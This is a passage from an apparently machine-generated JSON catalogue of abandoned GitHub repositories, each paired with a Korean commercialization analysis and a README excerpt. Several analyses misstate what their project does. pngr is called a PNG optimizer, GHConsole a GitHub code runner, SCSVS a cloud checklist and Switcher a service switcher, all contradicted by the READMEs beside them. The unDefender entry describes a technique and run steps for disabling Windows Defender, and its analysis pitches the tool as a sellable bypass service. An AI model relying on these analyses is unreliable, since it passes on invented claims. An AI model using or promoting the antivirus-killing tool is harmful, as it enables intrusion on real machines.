가이드로, 기술 진입장벽을 낮추는 교육 자원입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 포르투갈어권 코딩 초보자 대상 구독형 학습 경로 제공 서비스\n2. **기업 직원 재교육 프로그램","readme_excerpt":"# Por onde começar? \n\n> União de materiais totalmente gratuitos para ajudar quem desejar entrar em alguma área, aprender uma nova tecnologia ou aprimorar suas skills.\n\nCriei esse repositório com o intuito de reunir um pouco do conteúdo que vejo vagando por aí e que acaba sendo perdido por algumas pessoas. A ideia é reunir materiais disponibilizados de forma gratuita e livre sobre as mais diversas áreas e tecnologias da área de TI, para possibilitar que mais pessoas possam ter acesso a esses conteúdos e consigam ter um \"norte\" de por onde começar.\n\n<p align=\"center\">\n<img src=\"https://media.giphy.com/media/8MPtQ1ranGmze/giphy.gif\">\n</p>\n\n## Para contribuir:\n\n- Dê preferência para conteúdos que sejam em PT-BR (ou que contem com legenda). Nem todo mundo sabe inglês, e quanto mais material numa língua que todos entendam dentro do território brasileiro, melhor; \n\n- É necessário assegurar-se que o conteúdo está totalmente gratuito e livre (nada de plágio ou conteúdo ilícito);   \n\n- Separe os","composite_score":0.5038,"license_safety_tag":"unknown"},{"name":"bitvale/Switcher","github_url":"https://github.com/bitvale/Switcher","stars":5,"language":"Kotlin","license":"unknown","abandonment_months":53,"description":"# Switcher 분석 보고서\n\n## 왜 보물인가\n여러 서비스 간을 쉽게 전환할 수 있는 기술로, 사용자 경험을 크게 개선할 수 있는 핵심 기능입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 구독 플랜 간 전환, 결제 수단 변경 등을 자동화하는 사용자 관리 도구로 활용\n2. **내부 업무 도구**: 회사 내 여러 시스템(이메일, 저장소,","readme_excerpt":"# Switcher\n\n<img src=\"/art/preview.gif\" alt=\"sample\" title=\"sample\" width=\"260\" height=\"390\" align=\"right\" vspace=\"52\" />\n\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n[![Platform](https://img.shields.io/badge/platform-android-green.svg)](http://developer.android.com/index.html)\n[![API](https://img.shields.io/badge/API-17%2B-brightgreen.svg?style=flat)](https://android-arsenal.com/api?level=17)\n[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-Switcher-orange.svg?style=flat)](https://android-arsenal.com/details/1/7460)\n\nCreated this cool [switch animation](https://dribbble.com/shots/5429846-Switcher-XLIV) from [Oleg Frolov](https://dribbble.com/Volorf) as an android library. \n\n<a href=\"https://android.jlelse.eu/android-dynamic-custom-view-is-easy-433258cbb80f\">\n  <img alt=\"Read on Medium\" src=\"/art/medium.png\" width=\"196\" height=\"80\" hspace=\"15\" />\n</a>\n\nAPK\n-----\nInstall the latest [release](https","composite_score":0.5038,"license_safety_tag":"unknown"},{"name":"haixiangyan/nest-todo","github_url":"https://github.com/haixiangyan/nest-todo","stars":5,"language":"TypeScript","license":"unknown","abandonment_months":51,"description":"# nest-todo 상용화 분석 보고서\n\n## 왜 보물인가\n할 일 관리 앱을 빠르고 안정적으로 만들 수 있는 기술 틀을 제공하여, 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 팀 협업 할 일 관리 SaaS**\n- 회사 내 팀원들이 함께 업무를 관리하는 웹/앱 서비스로 운영\n- 월 구독료로 수익 창출\n\n**2. 내부 업무 관","readme_excerpt":"# nest-todo\n\n使用 React.js + Nest.js 实现一个简单的 Todo App。\n\n\n## 基础账号\n\n测试数据会默认添加 user 和 admin 两个用户，当然还会有 100 多个测试账号，下面是这两个账号的 `username` 和 `password` （密码在入库时做了 digest）。\n\n| 用户 | 密码 | 角色 |\n|---|---|---|\n| user | user | 普通用户 |\n| admin | admin | 管理员 |\n\n## 样例\n\n![](./screenshots/preview.webp)\n\n* 前端：localhost:3000\n* 后端：localhost:4200\n* Swagger 文档：localhost:4200/docs\n\n## 功能\n\n- [x] user 和 todo 两个资源的 CRUD 接口\n- [x] 数据库模块：TypeORM x mariadb（不用 mysql 是因为 M1 电脑无法使用 mysql 镜像），数据库迁移，数据库 seed\n- [x] 文件上传模块，使用 Express 的 Multer 实现\n- [x] 配置文件模块，使用 ConfigModule 读取本地 ENV 变量\n- [x] 日志模块，ReportLogger 模拟日志上报\n- [x] 静态资源模块，使用 StaticModule 使现\n- [x] 用户身份验证：local 和 jwt 两种策略\n- [x] 用户角色验证：区分普通用户和管理员两种角色\n- [x] Docker 部署环境\n- [x] Swagger 构建 API 文档\n- [x] WebSocket 实现数据传输\n- [x] Http 模块，http 的转发功能\n- [x] Error 模块，出错时，拦截错误，并按一定格式输出\n- [x] Transform 模块，以规定格式返回数据\n- [x] Task Scheduling 定时推送消息\n- [x] 编写单元测试\n- [x] 编写 e2e 测试\n\n\n## 本地运行\n\n使用 docker-compose 的方式来启动 redis, mariadb 2 个容器。\n\n> 一般来说本地开发都会使用 `npm run start` 这样的命令来启动项目，就不用放在 docker-compo","composite_score":0.5038,"license_safety_tag":"unknown"},{"name":"1milligram/html-dom","github_url":"https://github.com/1milligram/html-dom","stars":5,"language":"MDX","license":"MIT","abandonment_months":24,"description":"# 1milligram/html-dom 평가 분석\n\n## 왜 보물인가\n웹사이트의 화면 요소들을 쉽게 다루고 조작할 수 있도록 만든 도구 모음으로, 개발자들의 반복적인 작업을 크게 줄여줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **웹 기반 디자인 도구(SaaS)**: 사용자가 브라우저에서 직접 화면 요소를 드래그/드롭으로 편집할 수 있는 노코드 플랫","readme_excerpt":"# HTML DOM\n\n## Story\n\nWeb development goes very fast. I still remember the moments when starting to use [jQuery](https://jquery.com), [Prototype](http://prototypejs.org),\n[script.aculo.us](https://script.aculo.us), [Zepto](https://zeptojs.com) and many more.\n\nNowadays, even if our application is powered by modern tools such as Angular, Vue, React, Svelte, .etc, we have to deal with DOM.\nThe frameworks encapsulate and hide the DOM management directly, but still give us a door to work with DOM via _ref_, _event handlers_.\n\nIf you develop or use a web component in any framework, you have to work with DOM at a certain level.\n\nKnowing the browser DOM APIs and how to use them play an important role in web development.\nA website introducing the APIs, well-known problems, most popular questions could be very useful.\n\n## Features\n\n-   [x] No external library. Only native browsers' APIs\n-   [x] Small and easy to understand examples\n-   [x] Live demos\n-   [x] Many tips and good practices included","composite_score":0.5037,"license_safety_tag":"safe"},{"name":"graphcore/examples","github_url":"https://github.com/graphcore/examples","stars":8,"language":"Python","license":"MIT","abandonment_months":27,"description":"# Graphcore Examples 저장소 분석\n\n## 왜 보물인가\n그래프코어(Graphcore)라는 특수 인공지능 칩을 활용한 실제 사용 예제들을 모아놓았기 때문에, AI 기술을 더 빠르고 효율적으로 학습하고 구현할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **AI 교육 플랫폼 SaaS**: 기업 직원이나 학생에게 실무 기반 AI 학습 강의를 온라","readme_excerpt":"# Graphcore Application Examples\n\nThis repository contains a catalogue of application examples that have been optimised to run on Graphcore IPUs for both training and inference. Access reproducible code for a wide range of popular models covering NLP, Computer Vision, Speech, Multimodal, GNNs, AI for Simulation, Recommender Systems, and more. This includes a selection of models that achieve state of the art performance on IPUs, as well as code examples for self-learning.\n\nRun models out-the-box on IPUs integrated with popular ML frameworks and libraries:\n\n![Snip 2022-07-05 20 04 06](https://user-images.githubusercontent.com/81682248/177397772-4b671628-a7f4-4d8f-849d-2c5b54dba1de.png)\n\nTo see what's new, check out our [Model Garden](https://www.graphcore.ai/resources/model-garden) :tulip:, where you can easily filter applications by domain and framework.\n\nFor more detailed benchmark information, visit our [Performance Results page](https://www.graphcore.ai/performance-results).\n\n> The c","composite_score":0.5037,"license_safety_tag":"safe"},{"name":"HonkW93/automatic-verilog","github_url":"https://github.com/HonkW93/automatic-verilog","stars":11,"language":"Vim Script","license":"GPL-3.0","abandonment_months":31,"description":"# HonkW93/automatic-verilog 상용화 분석\n\n## 왜 보물인가\n전자기기 설계에 필수적인 복잡한 코드를 자동으로 생성해주는 도구로, 엔지니어들의 작업 시간을 획기적으로 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 반도체 설계 회사들을 위한 클라우드 기반 자동 코드 생성 플랫폼 (월 구독)\n2. **내부 업","readme_excerpt":"# automatic-verilog\n\n---\n\n![logo](https://cdn.jsdelivr.net/gh/HonkW93/automatic-verilog@master/demo/logo.png)                                                                                   \n\n一款基于vimscript的自动化verilog脚本。由[automatic for Verilog & RtlTree](https://www.vim.org/scripts/script.php?script_id=4067)修改而来，原作者zhangguo。部分功能参考[Verilog-Mode](https://veripool.org/verilog-mode/)。\n\n[![Release](https://img.shields.io/github/v/release/HonkW93/automatic-verilog?display_name=tag)](https://github.com/HonkW93/automatic-verilog/releases)[![Vim-Version](https://img.shields.io/badge/Vim-7.4.629-green.svg)](https://www.vim.org/download.php)[![License](https://img.shields.io/github/license/HonkW93/automatic-verilog)](https://github.com/HonkW93/automatic-verilog/blob/master/LICENSE)![stars](https://img.shields.io/github/stars/HonkW93/automatic-verilog)![forks](https://img.shields.io/github/forks/HonkW93/automatic-verilog)\n\n[中文](./README.md) | [English](./README_en.md)\n\n## 1. 安装\n\n### 1.1 简洁安装\n\n将`p","composite_score":0.5037,"license_safety_tag":"restricted"},{"name":"karlkeefer/pngr","github_url":"https://github.com/karlkeefer/pngr","stars":11,"language":"Go","license":"MIT","abandonment_months":26,"description":"# karlkeefer/pngr 분석 보고서\n\n## 왜 보물인가\nPNG 이미지 파일을 자동으로 최적화하여 웹사이트 속도를 빠르게 만드는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 온라인 이미지 압축 웹사이트로 운영하여 사용자가 브라우저에서 직접 이미지를 최적화\n2. **내부 업무 도구**: 전자상거래 업체의 상품 이미지 일괄 처리","readme_excerpt":"# PNGR Stack 🏓\n[![Build](https://github.com/karlkeefer/pngr/actions/workflows/build.yml/badge.svg?branch=master)](https://github.com/karlkeefer/pngr/actions/workflows/build.yml)\n\nDockerized (postgres + nginx + golang + react) starter kit\n\nOnly implements `users`, `sessions`, `password_resets`, and a toy `post` type to demonstrate basic CRUD. PNGR is _not_ a CMS.\n\n## Features and Stack\n\n- Hot-reload, front and back, including a test-runner for golang changes\n\n### Back-end\n- [golang-migrate](https://github.com/golang-migrate/migrate) already configured for easy migrations\n- [sqlc](https://github.com/kyleconroy/sqlc) for auto-generated sql bindings\n- [gomock](https://github.com/golang/mock) for auto-generated mocks (also rigged with hot-reload!)\n- [pgx](https://github.com/jackc/pgx) as a top tier db driver\n- [golang-jwt](https://github.com/golang-jwt/jwt) cookies with automatic refresh: ready for horizontal scaling\n- Simple [default middleware for CORS, CSRF, cookie parsing, etc](./golang","composite_score":0.5037,"license_safety_tag":"safe"},{"name":"ElvinC/gyroflow","github_url":"https://github.com/ElvinC/gyroflow","stars":6,"language":"Python","license":"GPL-3.0","abandonment_months":46,"description":"# Gyroflow 프로젝트 분석\n\n## 왜 보물인가\n동영상의 흔들림을 자동으로 잡아주는 기술로, 스마트폰이나 카메라로 찍은 영상을 영화처럼 부드럽게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 유튜브 크리에이터들이 매월 구독료를 내고 영상 안정화 서비스를 이용하는 클라우드 플랫폼\n2. **내부 업무 도구**: 방송국이나 영","readme_excerpt":"# Warning: This is the legacy version, find the project here: https://github.com/gyroflow/gyroflow\r\n\r\n# Gyroflow - Video stabilization using gyroscope data targeting drone footage\r\n\r\nJoin the [Gyroflow Discord server](https://discord.gg/BBJ2UVAr2D) for discussion and support.\r\n\r\n## [Website with more info](http://gyroflow.xyz/)\r\n\r\n## [In-depth video guide for 0.3.x-beta](https://youtu.be/f4YD5pGmnxM)\r\n\r\nA program built around Python, OpenCV, and PySide2 for video stabilization using gyroscope data.\r\n\r\nThe project consists of three core parts: A utility for the generation of lens undistortion preset, a utility for stabilizing footage using gyro data, and a utility for stretching 4:3 video to 16:9 using non-linear horizontal stretching (similar to GoPro's superview).\r\n\r\nThe main goal of creating something that can stabilize footage based on blackbox gyro data has mostly been achieved. Moving forwards, more work will be done to improve the quality of the result.\r\n\r\nThe launcher containing","composite_score":0.5037,"license_safety_tag":"restricted"},{"name":"glebarez/cero","github_url":"https://github.com/glebarez/cero","stars":5,"language":"Go","license":"MIT","abandonment_months":26,"description":"# glebarez/cero 보물 분석\n\n## 왜 보물인가\n데이터베이스와 프로그램을 연결하는 작업을 자동으로 처리해주는 도구로, 개발자들이 반복적인 코딩 작업을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객 데이터 관리 플랫폼에서 자동 동기화 기능으로 경쟁력 강화\n- **내부 업무 도구**: 회사의 여러 시스템 간 데","readme_excerpt":"![](https://img.shields.io/github/go-mod/go-version/glebarez/cero) ![](https://img.shields.io/codecov/c/github/glebarez/cero) [![build](https://github.com/glebarez/cero/actions/workflows/create-release.yaml/badge.svg)](https://github.com/glebarez/cero/actions/workflows/create-release.yaml)\n\n# cero\nCero will connect to remote hosts, and read domain names from the certificates provided during TLS handshake. <br>\nIt is not limited to only HTTPS, and will scrape certificates from any protocol that works over TLS (e.g. SMTPS) - just give it the right ports to connect to.<br>\nCero allows flexible specification of targets, including domain names, IP addresses, and CIDR ranges, with full support for IPv6.\n\n## Installation / Update\n- Download pre-compiled binary for your OS from [Latest release](https://github.com/glebarez/cero/releases/latest)\n- alternatively, compile from source:\n```bash\ngo install github.com/glebarez/cero@latest\n```\n\n## Usage examples\nConnect to remote host using its domain ","composite_score":0.5037,"license_safety_tag":"safe"},{"name":"securing/SCSVS","github_url":"https://github.com/securing/SCSVS","stars":8,"language":"","license":"unknown","abandonment_months":40,"description":"# SCSVS 저장소 분석\n\n## 왜 보물인가\n클라우드 서비스의 보안을 체계적으로 평가할 수 있는 표준 체크리스트로, 기업들이 안전한 시스템 구축에 필수적인 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 기반 협업 도구나 데이터 관리 플랫폼이 보안 기준을 충족하는지 자동 검사하는 기능\n- **내부 업무 도구**: 기업 IT팀이","readme_excerpt":"# Smart Contract Security Verification Standard\n\n## Authors\n\nDamian Rusinek (damian.rusinek@securing.pl), Paweł Kuryłowicz (pawel.kurylowicz@securing.pl)\n\n## Introduction\n\nSmart Contract Security Verification Standard (v1.2) is a FREE 14-part checklist created to standardize the security of smart contracts for developers, architects, security reviewers and vendors. This list helps to avoid the majority of known security problems and vulnerabilities by providing guidance at every stage of the development cycle of the smart contracts (from designing to implementation).\n\n**Objectives**\n* Help to develop high quality code of the smart contracts.\n* Help to mitigate known vulnerabilities by design.\n* Provide a checklist for security reviewers.\n* Provide a clear and reliable assessment of how secure a smart contract is in the relation to the percentage of SCSVS coverage.\n\n**Use cases**\n\nYou can use the SCSVS checklist in multiple ways:\n* As a starting point for formal threat modelling exercis","composite_score":0.5037,"license_safety_tag":"unknown"},{"name":"v8blink/v8-JavaScript-Documents","github_url":"https://github.com/v8blink/v8-JavaScript-Documents","stars":9,"language":"","license":"Apache-2.0","abandonment_months":44,"description":"# v8blink/v8-JavaScript-Documents 분석\n\n## 왜 보물인가\n자바스크립트 엔진(웹 브라우저의 '뇌')의 작동 원리를 상세하게 설명한 문서로, 웹 개발자들이 프로그램을 더 빠르고 효율적으로 만드는 데 필수적인 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 교육 플랫폼**: 온라인 프로그래밍 학원에서 심화 과정 교재로 판","readme_excerpt":"# 《Chrome V8源码》系列技术文章，3~4天一篇，持续更新中...   \r\n![avatar](v8.png)\r\n# 内容特点  \r\nV8涉及的技术十分广泛，包括了操作系统、编译技术、计算机系统结构等多方面知识。《Chrome V8源码》系列文章从基础说起，对V8内存分配、Isolate创建、handles概念、builtin、codegen、编译等多方面进行详细讲解。**本文章正在更新中，3~4天一篇。**   \r\n本文章的讲解风格是直接面对V8源码、分析V8源码的执行过程和重要数据结构，力求为读者展示一个“活动”的V8引擎。  \r\n# 读者定位  \r\n想深入理解V8源码，从中学习优秀设计思想，亦或是做V8安全研究的读者，等等。总之，想读V8源码的读者，请进来看看。  \r\n# 作者介绍  \r\n灰豆，V8粉丝一枚，正在努力做一名V8源码的朗读者。   \r\n微信：qq9123013 备注：v8交流 \r\n# 文章位置  \r\n**知乎** ： https://www.zhihu.com/people/v8blink\r\n# 不足之处  \r\n文章中理论知识很少。我也想多讲解些理论，但个人能力和时间精力确实有限，无法做全面的讲解。文中有很多的不足与纰漏，欢迎批评指正。  \r\n# 文章目录  \r\n目前的最新目录如下：   \r\n《Chrome V8 源码》56. GC 垃圾回收 1     \r\n《Chrome V8 源码》55. 优化技术综述，如何提升 JS 运行速度   \r\n《Chrome V8 源码》54. Inline Cache 源码（二）      \r\n《Chrome V8 源码》53. Inline Cache 源码（一）     \r\n《Chrome V8 源码》52. 解密JSON序列化、stringify源码分析    \r\n《Chrome V8 源码》51. 揭开 bind 和 call 的神秘面纱     \r\n《Chrome V8 源码》50.JS 数值转换的内幕，Number() 源码分析    \r\n《Chrome V8 源码》49. new String 和 String 的本质区别     \r\n《Chrome V8 源码》48. 弱类型加法的奥秘，\"+\" 源码分析     \r\n《Chrome V8 源码》47. \"Equal\" 与 \"StrictEq","composite_score":0.5036,"license_safety_tag":"safe"},{"name":"eddiekaiger/SwiftyAttributes","github_url":"https://github.com/eddiekaiger/SwiftyAttributes","stars":13,"language":"Swift","license":"mit","abandonment_months":29,"description":"# SwiftyAttributes 상용화 분석\n\n## 왜 보물인가\n아이폰 앱에서 글자를 예쁘게 꾸미는 작업을 훨씬 간단하게 만들어주는 개발자용 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 노코드 아이폰 앱 빌더 플랫폼에서 사용자가 텍스트 꾸밈 기능을 쉽게 사용하도록 제공\n2. **내부 업무 도구**: 대형 아이폰 앱 개발사에서 개","readme_excerpt":"# SwiftyAttributes\n\n#### *A Swifty API for attributed strings.*\n\n![Swift Version](https://img.shields.io/badge/swift-5-orange.svg?style=flat)\n![Swift Version](https://img.shields.io/badge/swift-4.2-orange.svg?style=flat)\n[![Carthage compatible](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat)](https://github.com/Carthage/Carthage)\n[![CocoaPods Compatible](https://img.shields.io/cocoapods/v/SwiftyAttributes.svg)](https://img.shields.io/cocoapods/v/SwiftyAttributes.svg)\n[![Platform](https://img.shields.io/cocoapods/p/SwiftyAttributes.svg?style=flat)](http://cocoapods.org/pods/SwiftyAttributes)\n[![Travis CI](https://travis-ci.org/eddiekaiger/SwiftyAttributes.svg?branch=master)](https://travis-ci.org/eddiekaiger/SwiftyAttributes.svg?branch=master)\n[![codecov.io](http://codecov.io/github/eddiekaiger/SwiftyAttributes/coverage.svg?branch=master)](http://codecov.io/github/eddiekaiger/SwiftyAttributes/coverage.svg?branch=master)\n\n---\n\nWith **SwiftyAttributes**, you can cr","composite_score":0.5036,"license_safety_tag":"safe"},{"name":"FeedHive/twitter-api-client","github_url":"https://github.com/FeedHive/twitter-api-client","stars":12,"language":"TypeScript","license":"MIT","abandonment_months":46,"description":"# twitter-api-client 분석 보고서\n\n## 왜 보물인가\n트위터(X)의 공식 기능을 프로그래밍으로 자동화할 수 있는 도구로, 마케팅이나 데이터 수집을 손쉽게 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **소셜 미디어 관리 SaaS**: 여러 계정의 트윗을 한 번에 예약 발행하고 팔로워 반응을 자동으로 분석하는 서비스\n2. **마케팅 회","readme_excerpt":"# Twitter API Client\n\nNode.js client for Twitter API\n\n![](https://i.imgur.com/NfnLHIM.png)\n\n[![NPM Version](https://img.shields.io/npm/v/twitter-api-client)](https://www.npmjs.com/package/twitter-api-client)\n![Build Status](https://github.com/FeedHive/twitter-api-client/workflows/build/badge.svg)\n\n### ⚠️ Important notice\n\nTwitter now has an [official TypeScript SDK](https://github.com/twitterdev/twitter-api-typescript-sdk).  \nWe recommend using that instead of this client.\n\nThis project will be maintained, but will not be developed any further.\n\nTo all contributors who added to this project: Thank you 🧡\n\n## Table of content\n\n- [Features](#features)\n- [**Getting Started**](#getting-started)\n- [Usage](#usage)\n- [License](#license)\n- [Get Help](#get-help)\n- [Contribute](#contribute)\n\n## Features\n\n☑️ Includes 90% of the **official Twitter API** endpoints.  \n☑️ **Promise-based!** No ugly callbacks.  \n☑️ **Fully typed!** Both for query parameters and responses.  \n☑️ Inbuilt in-memory **cache","composite_score":0.5035,"license_safety_tag":"safe"},{"name":"facebookresearch/torcharrow","github_url":"https://github.com/facebookresearch/torcharrow","stars":13,"language":"Python","license":"BSD-3-Clause","abandonment_months":26,"description":"# TorchArrow 상업화 분석\n\n## 왜 보물인가\n페이스북 연구팀이 만든 이 도구는 대규모 데이터를 빠르게 처리하는 기술로, 데이터 분석 회사들이 필요로 하는 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n1. **데이터 분석 SaaS**: 고객사의 대량 판매 기록, 고객 정보 같은 데이터를 몇 초 만에 분석해주는 클라우드 서비스\n2. **기업 내부","readme_excerpt":"# TorchArrow: a data processing library for PyTorch\n\n**This library currently does not have a stable release. The API and implementation may change. \nFuture changes may not be backward compatible.**\n\nTorchArrow is a [torch](https://github.com/pytorch/pytorch).Tensor-like Python DataFrame library for data preprocessing in PyTorch models, with two high-level features:\n\n* DataFrame library (like Pandas) with strong GPU or other hardware acceleration (under development) and PyTorch ecosystem integration.\n* Columnar memory layout based on [Apache Arrow](https://arrow.apache.org/docs/format/Columnar.html#physical-memory-layout) with strong variable-width and nested data support (such as string, list, map) and Arrow ecosystem integration.\n\n## Installation\n\nYou will need Python 3.7 or later. Also, we highly recommend installing an [Miniconda](https://docs.conda.io/en/latest/miniconda.html#latest-miniconda-installer-links) environment.\n\nFirst, set up an environment. If you are using conda, crea","composite_score":0.5035,"license_safety_tag":"safe"},{"name":"GameTechDev/XeGTAO","github_url":"https://github.com/GameTechDev/XeGTAO","stars":39,"language":"C++","license":"MIT","abandonment_months":25,"description":"# XeGTAO 상용화 분석 보고서\n\n## 왜 보물인가\n게임과 영상 제작에서 빛과 그림자를 자동으로 계산해주는 기술로, 전문가 수준의 영상 품질을 누구나 쉽게 만들 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **게임 개발 SaaS**: 소규모 게임사들이 고가의 그래픽 엔진 대신 이 기술을 월 구독으로 사용\n2. **영상 제작 내부 도구**: 광고 ","readme_excerpt":"# DISCONTINUATION OF PROJECT #  \nThis project will no longer be maintained by Intel.  \nIntel has ceased development and contributions including, but not limited to, maintenance, bug fixes, new releases, or updates, to this project.  \nIntel no longer accepts patches to this project.  \n If you have an ongoing need to use this project, are interested in independently developing it, or would like to maintain patches for the open source software community, please create your own fork of this project.  \n  \n# XeGTAO\n\n## Introduction\n\nXeGTAO is an open source, MIT licensed, DirectX/HLSL implementation of the  _Practical Realtime Strategies for Accurate Indirect Occlusion, GTAO_ [\\[Jimenez et al., 2016\\]](https://www.activision.com/cdn/research/Practical_Real_Time_Strategies_for_Accurate_Indirect_Occlusion_NEW%20VERSION_COLOR.pdf), a screen space effect suitable for use on a wide range of modern PC integrated and discrete GPUs. The main benefit of GTAO over other screen space algorithms is that","composite_score":0.5035,"license_safety_tag":"safe"},{"name":"WorldDbs/rust-fil-proofs","github_url":"https://github.com/WorldDbs/rust-fil-proofs","stars":13,"language":"Rust","license":"NOASSERTION","abandonment_months":61,"description":"# rust-fil-proofs 분석 보고서\n\n## 왜 보물인가\n블록체인 저장소 증명 기술의 핵심 엔진으로, 대규모 분산 저장 네트워크의 신뢰성을 보장하는 필수 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n1. **클라우드 저장소 검증 서비스**: 기업의 데이터가 정말 안전하게 보관되고 있는지 확인해주는 구독형 모니터링 서비스\n2. **분산 저장 네트워크 A","readme_excerpt":"# worlddatabase Proving Subsystem\n","composite_score":0.5035,"license_safety_tag":"unknown"},{"name":"Rich-Harris/svelte-cubed","github_url":"https://github.com/Rich-Harris/svelte-cubed","stars":23,"language":"Svelte","license":"MIT","abandonment_months":41,"description":"# Svelte Cubed 상용화 분석\n\n## 왜 보물인가\n3D 그래픽을 쉽게 웹사이트에 넣을 수 있는 도구로, 게임이나 건축 시뮬레이션처럼 화려한 시각효과가 필요한 서비스들이 빠르게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **3D 제품 시뮬레이터 SaaS**: 가구, 자동차, 의류 회사들이 고객에게 제품을 360도 회전시켜 보여주는 서비스\n2","readme_excerpt":"# svelte-cubed\n\nA Three.js component library for Svelte.\n\nhttps://svelte-cubed.vercel.app\n\n## Developing\n\nThis repo uses [pnpm](https://pnpm.io/). Install it...\n\n```\nnpm install -g pnpm\n```\n\n...then install dependencies:\n\n```\npnpm install\n```\n\nRun `pnpm dev -- --open` to launch the demo site.\n\n## License\n\n[MIT](LICENSE)\n","composite_score":0.5034,"license_safety_tag":"safe"},{"name":"APTortellini/unDefender","github_url":"https://github.com/APTortellini/unDefender","stars":7,"language":"C++","license":"unknown","abandonment_months":53,"description":"# unDefender 분석 보고서\n\n## 왜 보물인가\nWindows 보안 시스템을 우회하는 기술로, 보안 연구나 침투 테스트 분야에서 수요가 있는 전문 도구입니다.\n\n## 어디에 쓸 수 있나\n- **보안 진단 SaaS**: 기업의 방어 체계 취약점을 테스트하는 클라우드 서비스로 판매\n- **펜테스트 API**: 보안 회사들이 자동화된 침투 테스트에 활용하","readme_excerpt":"# unDefender\r\n### Killing your preferred antimalware by abusing native symbolic links and NT paths\r\n\r\nunDefender is the C++ implementation of a technique originally described by [@jonasLyk](https://twitter.com/jonasLyk) in [this Twitter thread](https://twitter.com/jonasLyk/status/1378143191279472644).  \r\nAt its core, this technique revolves around changing the \\Device\\BootDevice symbolic link in the Windows Object Manager so that when Defender's WdFilter driver is unloaded and loaded again by its Tamper Protection feature, another file is mapped in memory in place of the original WdFilter.sys, rendering it effectively useless!\r\n\r\n__Requirements__\r\n- Compile unDefender.exe in Release x64 configuration;\r\n- Place unDefender.exe and the provided legit.sys in the same folder;\r\n- Run an elevated cmd.exe/powershell.exe and navigate to said folder;\r\n- `.\\unDefender.exe`\r\n- Profit :)\r\n\r\n__Tested on__\r\n- [x] Windows 10 20H2\r\n- [x] Windows 10 21H1\r\n- [x] Windows 11\r\n","composite_score":0.5034,"license_safety_tag":"unknown"},{"name":"FloeDesignTechnologies/phpcs-security-audit","github_url":"https://github.com/FloeDesignTechnologies/phpcs-security-audit","stars":6,"language":"PHP","license":"gpl-3.0","abandonment_months":41,"description":"# phpcs-security-audit 상용화 분석\n\n## 왜 보물인가\n웹사이트 제작 시 보안 문제를 자동으로 찾아주는 도구로, 해킹으로부터 고객 정보를 보호하려는 기업들의 필수 요구사항입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 웹개발사 내부 도구 SaaS**\n- 개발팀이 코드 작성 후 자동으로 보안 검사를 수행하는 클라우드 서비스\n\n**2. 웹사이트","readme_excerpt":"phpcs-security-audit v3\n=======================\n\n<div aria-hidden=\"true\">\n\n[![License: GPLv3](https://poser.pugx.org/pheromone/phpcs-security-audit/license)](https://github.com/FloeDesignTechnologies/phpcs-security-audit/blob/master/LICENSE)\n[![Minimum PHP Version](https://img.shields.io/packagist/php-v/pheromone/phpcs-security-audit.svg?maxAge=3600)](https://packagist.org/packages/pheromone/phpcs-security-audit)\n[![Latest Stable Version](https://poser.pugx.org/pheromone/phpcs-security-audit/v/stable)](https://packagist.org/packages/pheromone/phpcs-security-audit)\n[![Release Date of the Latest Version](https://img.shields.io/github/release-date/FloeDesignTechnologies/phpcs-security-audit.svg?maxAge=1800)](https://github.com/FloeDesignTechnologies/phpcs-security-audit/releases)\n[![Packagist Downloads](https://img.shields.io/packagist/dt/Pheromone/phpcs-security-audit)](https://packagist.org/packages/pheromone/phpcs-security-audit)\n[![Last Commit to Unstable](https://img.shields.io/githu","composite_score":0.5034,"license_safety_tag":"restricted"},{"name":"Liaoworking/GHConsole","github_url":"https://github.com/Liaoworking/GHConsole","stars":13,"language":"Objective-C","license":"MIT","abandonment_months":72,"description":"# GHConsole 상업화 분석\n\n## 왜 보물인가\n깃허브(GitHub) 웹사이트에서 직접 코드를 실행하고 관리할 수 있는 도구로, 개발자들이 별도의 프로그램 설치 없이 작업할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발자용 온라인 작업 플랫폼으로 월 구독료를 받고 제공\n2. **내부 업무 도구**: 대규모 개발팀의 ","readme_excerpt":"#  ![Alt text](http://img.njbanban.com/GHOwn/GHConsoleLogo2.png)\n\n# GHConsole\n\n\n中文版本请参看[这里](https://github.com/Liaoworking/GHConsole/wiki)\n\n\n\nAn easy  and wireless way to get what you had logged and wanted to see in your App.\n\n## [GHConsole/Swift](https://github.com/Liaoworking/GHConsole-swift)\n\n![Swift Version](https://img.shields.io/badge/xCode-9.1+-blue.svg)\n![Swift Version](https://img.shields.io/badge/iOS-7.0+-blue.svg) \n![Plaform](https://img.shields.io/badge/Platform-iOS-lightgrey.svg)\n![License MIT](https://img.shields.io/badge/License-MIT-lightgrey.svg) \n\n![Alt text](http://oyrr7ye20.bkt.clouddn.com/GHOwn/Untitled.gif)\n\n\n## Installation\nSimply add GHConsole folder with files to your project.\n\n## Usage example\n\nSimply start GHConsole in your App. GHConsole view will be added above the key window as a view.\n\nYou can find example projects [here](https://github.com/liaoworking/GHConsole)\n\n#### Start Log on GHConsole\n\nYou just only initialize GHConsole in your appDelegate.m When 